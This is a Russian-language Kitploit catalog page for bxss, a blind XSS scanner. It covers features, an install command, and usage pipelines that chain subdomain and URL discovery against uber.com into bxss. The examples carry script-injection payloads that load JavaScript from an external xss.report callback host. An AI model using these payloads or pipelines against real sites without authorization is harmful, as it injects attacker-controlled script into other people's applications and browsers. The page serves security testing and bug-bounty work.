Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ethicalhackingplayground/bxss
Сканеры уязвимостейСканеры веб-уязвимостейСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubethicalhackingplayground/bxss

bxss

Blind XSS Scanner — это инструмент, который можно использовать для сканирования слепых XSS-уязвимостей в веб-приложениях.

Репозиторий
418551 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться


Bxss
Bxss - Сканер Blind XSS

Version License Go Report Card Go Reference


🚀 Описание

Bxss — это высокопроизводительный сканер Blind XSS, автоматизирующий обнаружение слепых XSS-уязвимостей в веб-приложениях.


✨ Возможности

  • Внедряет полезные нагрузки Blind XSS в пользовательские заголовки и параметры
  • Поддерживает несколько HTTP-методов (PUT, POST, GET, OPTIONS)
  • Высокоскоростное сканирование с поддержкой параллелизма
  • Легко объединяется с другими инструментами
  • Простая установка и использование

🧠 В разработке

Мы активно работаем над интеграцией пула воркеров на основе Chromium для повышения производительности bxss на устройствах с низкой производительностью.

Эта функция позволит выгружать ресурсоёмкие задачи, такие как обнаружение DOM-based XSS или проверка полезной нагрузки после срабатывания, на лёгкие экземпляры Chromium, управляемые через пул. Распределяя нагрузку между несколькими контекстами безголового браузера контролируемым и эффективным образом, bxss останется отзывчивым и удобным даже на машинах с низкими характеристиками.

Это сделает bxss не только мощным, но и высокодоступным, независимо от системных ограничений.


✅ Планы

  • Пул воркеров на основе Chromium для взаимодействия с DOM и визуальной проверки
  • Опциональный вывод отчётов в HTML/JSON
  • Добавить поддержку настройки полезных нагрузок для нескольких платформ (XSS Hunter, Interactsh и т.д.)
  • Поддержка прокси
  • Импорт пользовательских запросов

🧪 Экспериментальные функции

  • Режим трассировки (экспериментальный)

📦 Установка

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ Аргументы


🎬 Демонстрация

Демо


📝 Что такое режим трассировки?

Режим трассировки — это экспериментальная функция, которая позволяет отследить, где сработал BlindXSS. Некоторые сторонние платформы BlindXSS, такие как https://xss.report/, позволяют задавать пользовательские параметры в ваших полезных нагрузках. Это позволяет отследить, где сработал BlindXSS. Например, если вы укажете параметр url=https://somehost.com в вашей полезной нагрузке, инструмент будет использовать полезную нагрузку

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

для тестирования, и при срабатывании вы сможете проверить DOM и увидеть, с какого хоста сработал BlindXSS.

Отчёт XSS

Убедитесь, что при назначении пользовательских параметров в вашей панели управления вы указываете url={LINK}, чтобы bxss мог автоматически заменять {LINK} на фактический URL.

🔥 Примеры использования

Параметры

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Добавить к параметрам

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

И заголовки, и параметры

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Заголовок X-Forwarded-For

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Пользовательские заголовки и параметры

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks с Dorki

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Пользовательские заголовки и параметры с лимитом запросов

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

Для продвинутого поиска уязвимостей с помощью dorking посетите Dorki и зарегистрируйтесь сегодня!


☕ Поддержите проект

Если вы получили вознаграждение с помощью этого инструмента, подумайте о поддержке — купите мне кофе!

Купите мне кофе

Скачать инструмент
АргументОписаниеПо умолчанию
-aДобавить полезную нагрузку к параметруfalse
-c intУстановить уровень параллелизма30
-H stringУстановить пользовательский заголовок""
-hf stringПуть к файлу с заголовками""
-p stringПолезная нагрузка Blind XSS""
-pf stringПуть к файлу с полезными нагрузками""
-tТестировать параметры на Blind XSSfalse
-X stringИспользуемый HTTP-метод""
-vВключить режим отладкиfalse
-rl floatЛимит запросов (запросов в секунду)0
-fСледовать перенаправлениямfalse
-lВключить режим трассировки (экспериментальный)false